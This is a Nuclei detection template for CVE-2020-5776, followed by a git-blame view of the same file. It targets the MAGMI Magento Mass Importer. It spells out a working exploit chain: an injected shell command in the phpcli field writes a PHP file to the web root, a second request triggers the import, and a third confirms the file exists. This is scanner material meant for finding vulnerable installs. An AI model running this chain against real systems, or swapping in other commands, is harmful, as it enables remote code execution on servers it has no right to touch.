nuclei-templates/cves/2020/CVE-2020-5776.yaml

id: CVE-2020-5776

info:
  name: Cross Site Request Forgery (CSRF) in MAGMI (Magento Mass Importer) Plugin
  author: dwisiswant0
  severity: high
  description: Currently, all versions of MAGMI are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI.
  reference: https://www.tenable.com/security/research/tra-2020-51
  tags: cve,cve2020,magmi,magento

  # Due to the lack of CSRF tokens, RCE (via phpcli command) is possible
  # in the event that a CSRF is leveraged against an existing admin session for MAGMI.
  # At the time of this advisory, no patch exists for this issue.

requests:
  - raw:
      - |
        POST /magmi/web/magmi_saveprofile.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
      - |
        POST /magmi/web/magmi_run.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update
      - |
        GET /magmi/web/info.php HTTP/1.1
        Host: {{Hostname}}
        Connection: close
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and
      - type: status
        status:
          - 200
misc changes 2021-01-02 04:56:15 +00:00			`id: CVE-2020-5776`
:fire: Add CVE-2020-5776 2020-09-04 13:19:13 +00:00
			`info:`
updates 2020-09-05 06:34:18 +00:00			`name: Cross Site Request Forgery (CSRF) in MAGMI (Magento Mass Importer) Plugin`
			`author: dwisiswant0`
			`severity: high`
			`description: Currently, all versions of MAGMI are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI.`
Make a relevant reference link 2021-03-16 15:12:21 +00:00			`reference: https://www.tenable.com/security/research/tra-2020-51`
Added a few Magento related templates 2021-05-18 13:53:10 +00:00			`tags: cve,cve2020,magmi,magento`
:fire: Add CVE-2020-5776 2020-09-04 13:19:13 +00:00
			`# Due to the lack of CSRF tokens, RCE (via phpcli command) is possible`
:pencil: Remove trailing spaces 2020-09-04 13:34:53 +00:00			`# in the event that a CSRF is leveraged against an existing admin session for MAGMI.`
:fire: Add CVE-2020-5776 2020-09-04 13:19:13 +00:00			`# At the time of this advisory, no patch exists for this issue.`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00
:fire: Add CVE-2020-5776 2020-09-04 13:19:13 +00:00			`requests:`
			`- raw:`
			`- \|`
			`POST /magmi/web/magmi_saveprofile.php HTTP/1.1`
			`Host: {{Hostname}}`
Misc (minor) Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-19 14:25:01 +00:00			`Content-Type: application/x-www-form-urlencoded`
:fire: Add CVE-2020-5776 2020-09-04 13:19:13 +00:00			`Connection: close`

workflow updates 2021-01-09 13:28:57 +00:00			profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=
:fire: Add CVE-2020-5776 2020-09-04 13:19:13 +00:00			`- \|`
			`POST /magmi/web/magmi_run.php HTTP/1.1`
			`Host: {{Hostname}}`
Misc (minor) Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-19 14:25:01 +00:00			`Content-Type: application/x-www-form-urlencoded`
:fire: Add CVE-2020-5776 2020-09-04 13:19:13 +00:00			`Connection: close`

			`engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update`
			`- \|`
			`GET /magmi/web/info.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Connection: close`
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "PHP Extension"`
			`- "PHP Version"`
			`condition: and`
			`- type: status`
			`status:`
			`- 200`